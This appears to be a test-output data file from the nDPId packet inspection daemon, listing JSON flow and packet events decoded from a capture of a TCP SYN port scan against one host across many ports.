-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsc5UAACcGrd2sEAAIQA2GNIzTF3ndU4MZAAAAAGACEAAREwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1399,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGAAACYGlhKsEAAIQA2GNIzTEJLdU4MZAAAAAGACDAAb+gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAs2QcAAC8GQGusEAAIQA2GNIzTDSrdU4MZAAAAAGACEAAbYgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1401,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAspzIAACYGe0CsEAAIQA2GNIzTH0HdU4MZAAAAAGACDAANSwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49153,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1402,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsVwYAADgGuWysEAAIQA2GNIzTwAHdU4MZAAAAAGACBAB0igAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsctcAACcGrpusEAAIQA2GNIzTAtLdU4MZAAAAAGACEAAlugAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":513,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1404,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsyx4AACUGWFSsEAAIQA2GNIzTAgHdU4MZAAAAAGACCAAuiwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsagcAADMGq2usEAAIQA2GNIzTS1PdU4MZAAAAAGACEADdOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1406,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsEW4AAC0GCgWsEAAIQA2GNIzTBGbdU4MZAAAAAGACCAAsJgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAscDEAADoGnkGsEAAIQA2GNIzTI\/fdU4MZAAAAAGACDAAIlQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060595,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_packet_id":1,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060595,"pkt":"ACYLMQczACWzv5HuCABFAAAsJJwAADMG8NasEAAIQA2GNIzT4uDdU4MZAAAAAGACEABFqwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5961,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1409,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1sAACUG7BesEAAIQA2GNIzTF0ndU4MZAAAAAGACCAAZQwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsFcMAACoGCLCsEAAIQA2GNIzT3aHdU4MZAAAAAGACDABO6gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1421,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAshNgAAC4GlZqsEAAIQA2GNIzTGabdU4MZAAAAAGACDAAS5gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1422,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsTIcAADAGy+usEAAIQA2GNIzTBDXdU4MZAAAAAGACBAAwVwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32772,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1413,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsBBMAADAGFGCsEAAIQA2GNIzTgATdU4MZAAAAAGACBAC0hwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsDhkAACkGEVqsEAAIQA2GNIzTBB\/dU4MZAAAAAGACCAAsbQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1425,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1415,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsrPEAADMGaIGsEAAIQA2GNIzTAFjdU4MZAAAAAGACEAAoNAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1416,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs5rAAADcGKsKsEAAIQA2GNIzTBAvdU4MZAAAAAGACEAAkgQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1417,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVR8AAC0GxlOsEAAIQA2GNIzTTiDdU4MZAAAAAGACCADiawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1418,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs7JwAACgGM9asEAAIQA2GNIzTCI\/dU4MZAAAAAGACBAAr\/QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1145,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1429,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1419,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsVPkAACcGzHmsEAAIQA2GNIzTBHndU4MZAAAAAGACEAAkEwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1420,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsGHUAACwGA\/6sEAAIQA2GNIzTDNPdU4MZAAAAAGACBAAnuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1431,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1421,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsE9wAADUG\/5asEAAIQA2GNIzTBUjdU4MZAAAAAGACCAArRAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":541,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1432,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1422,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAsnvwAACgGgXasEAAIQA2GNIzTAh3dU4MZAAAAAGACBAAybwAAAgQFtA=="} 